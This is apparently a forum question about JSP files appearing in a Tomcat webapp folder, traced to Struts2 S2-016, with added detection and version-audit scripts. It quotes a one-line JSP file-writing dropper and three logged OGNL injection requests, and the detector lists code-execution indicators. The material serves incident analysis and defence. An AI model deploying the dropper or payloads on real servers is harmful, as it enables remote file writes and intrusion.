Tomcat Files Getting uploaded - Security Loophole


I have tried hosting a Struts2 app on a public domain using Tomcat 7.x with Apache 2.2 fronting Tomcat.

I see some malicious activity in my web app folder.

Every time, I see files like indcx.jsp, maneger.jsp, uplod.jsp, etc., and many such unknown files getting uploaded into the tomcat/webapp/application folder.

I manually delete these files every time, but I wanted to know if there is any setting or configuration which can prevent such malicious/hacker activity and the uploading of such unknown files.

Edit

I have seen such files again, and the contents of the file are as below:

  <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

My question is how is someone able to upload this file on my server?

Edit Again

After close analysis this looks like a Struts2 or XWork security issue or vulnerability now; here are all the logs, which tell most of the remaining story:

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

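Decoded, each of the three logged requests puts an OGNL expression in the *name* of a `redirect:` prefix parameter; the expression fetches the HttpServletRequest from the XWork context, calls getRealPath("/") and prints the result into the response, which is the reconnaissance step before a dropper like the one-line JSP above is written into that directory. The following detector is an added example (not code from the post or from the Struts project): it parses Apache access-log lines, percent-decodes the query string, and flags requests whose `redirect:`/`redirectAction:` parameter name carries `${` or `%{`, the S2-016 pattern. The three malicious lines are copied from the post's logs; the two benign lines and the indicator list are constructed for the example.

```python
"""Detect Struts2 S2-016 style OGNL injection in Apache access logs.

Added example, not part of the original post. The S2-016 pattern is an
action-name prefix parameter (redirect: or redirectAction:) whose *name*
carries an OGNL expression, ${...} or %{...}, so the expression must be
recovered from the parameter name rather than the parameter value.
"""
import re
from urllib.parse import unquote

# Apache common/combined log prefix: ip ident user [ts] "METHOD TARGET PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
PREFIX_RE = re.compile(r'^(redirect|redirectAction):', re.IGNORECASE)
OGNL_RE = re.compile(r'[$%]\{')

# Fragments showing the expression reaching the servlet container or the JVM
# (constructed list; extend it from your own traffic).
INDICATORS = (
    '#context.get(',
    'com.opensymphony.xwork2.dispatcher',
    '#_memberAccess',
    'java.lang.Runtime',
    'java.lang.ProcessBuilder',
    'getRealPath(',
)

# Constructed sample: the three lines from the post plus two benign lines.
SAMPLE_LOG = [
    '60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74',
    '60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74',
    '60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test3.action?redirect:$%7B%23a%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74',
    # Benign: a redirect: prefix with a plain path, no OGNL (a naive grep for "redirect:" would flag it).
    '10.0.0.7 - - [27/Jan/2014:17:51:50 +0530] "GET /common/test.action?redirect:/common/home.action HTTP/1.0" 302 0',
    '10.0.0.5 - - [27/Jan/2014:17:52:01 +0530] "GET /common/login.action?user=bob&lang=en HTTP/1.1" 200 512',
]


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_params(target):
    """Return (name, value) pairs from the query string, percent-decoded.
    Split on raw '&' and '=' first: the payload encodes its own '=' as %3d,
    so the whole expression stays inside the parameter name."""
    query = target.split('?', 1)[1] if '?' in target else ''
    params = []
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            params.append((unquote(name), unquote(value)))
    return params


def classify(line):
    """Return a finding for an S2-016 style request, otherwise None."""
    rec = parse_line(line)
    if rec is None:
        return None
    for name, _value in decode_params(rec['target']):
        if PREFIX_RE.match(name) and OGNL_RE.search(name):
            prefix, expr = name.split(':', 1)
            return {
                'ip': rec['ip'],
                'time': rec['ts'],
                'action': rec['target'].split('?', 1)[0],
                'prefix': prefix,
                'ognl': expr,
                'indicators': [i for i in INDICATORS if i in expr],
                'status': int(rec['status']),
            }
    return None


def scan(lines):
    """Run classify() over an iterable of log lines and keep the findings."""
    return [f for f in map(classify, lines) if f]


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['action']} {f['prefix']}: status={f['status']} "
              f"indicators={f['indicators']}\n  {f['ognl']}")
```

The decoded `ognl` field is what to read: the status 200 on a request that should never be answered with a page is the attacker's confirmation that the expression was evaluated, so the same source IP's later requests (the ones that wrote the JSP files) are the next thing to pull from the log.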

1 answer

user3254782

Seems like you need to upgrade your struts2. Certain versions are vulnerable to what you're describing: http://struts.apache.org/release/2.3.x/docs/s2-016.html
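To act on that answer you first need to know which struts2-core version is actually deployed. The S2-016 advisory linked above lists Struts 2.0.0 through 2.3.15 as affected and 2.3.15.1 as the first fixed release; the script below is an added example (not from the post or from the Struts project) that walks every `WEB-INF/lib` under a Tomcat `webapps` directory, reads the version from the Maven-style jar name `struts2-core-<version>.jar`, and reports whether it predates the fix. The filename convention and the temporary `webapps` tree built by `demo()` are assumptions for the example; a deployment that renames its jars needs the version read from the jar's MANIFEST.MF instead.

```python
"""Audit Tomcat webapps for a struts2-core jar that predates the S2-016 fix.

Added example, not part of the original post or the Struts project.
Assumes Maven jar naming (struts2-core-<version>[-qualifier].jar) and uses
2.3.15.1 as the first fixed release, per the S2-016 advisory.
"""
import re
import tempfile
from pathlib import Path

JAR_RE = re.compile(r'^struts2-core-(\d+(?:\.\d+)*)(?:-[\w.]+)?\.jar$')
S2_016_FIXED = (2, 3, 15, 1)   # first release containing the S2-016 fix


def parse_version(text):
    """'2.3.15' -> (2, 3, 15); tuples compare component-wise."""
    return tuple(int(p) for p in text.split('.'))


def is_vulnerable(version):
    """True when the version sorts before 2.3.15.1.
    Tuple ordering gives (2, 3, 15) < (2, 3, 15, 1) < (2, 3, 16)."""
    return parse_version(version) < S2_016_FIXED


def audit(webapps_root):
    """Report every struts2-core jar found under <webapps_root>/*/WEB-INF/lib."""
    findings = []
    for jar in sorted(Path(webapps_root).glob('*/WEB-INF/lib/struts2-core-*.jar')):
        m = JAR_RE.match(jar.name)
        if not m:          # renamed or non-Maven jar: inspect its manifest by hand
            continue
        findings.append({
            'webapp': jar.parts[-4],
            'jar': jar.name,
            'version': m.group(1),
            'vulnerable': is_vulnerable(m.group(1)),
        })
    return findings


def demo():
    """Constructed webapps tree with empty placeholder jars, then audit it."""
    root = Path(tempfile.mkdtemp())
    for app, jar in (('application', 'struts2-core-2.3.14.jar'),
                     ('other', 'struts2-core-2.3.15.1.jar')):
        lib = root / app / 'WEB-INF' / 'lib'
        lib.mkdir(parents=True)
        (lib / jar).touch()
    return audit(root)


if __name__ == '__main__':
    import sys
    results = audit(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for r in results:
        flag = 'VULNERABLE (S2-016)' if r['vulnerable'] else 'ok'
        print(f"{r['webapp']}: {r['jar']} -> {flag}")
```

Run it as `python audit_struts.py /path/to/tomcat/webapps` against a real install. Note that tightening filesystem permissions on the webapp folder only blocks this particular dropper; the OGNL expression runs with the Tomcat process's privileges, so nothing short of upgrading past 2.3.15 removes the code execution itself.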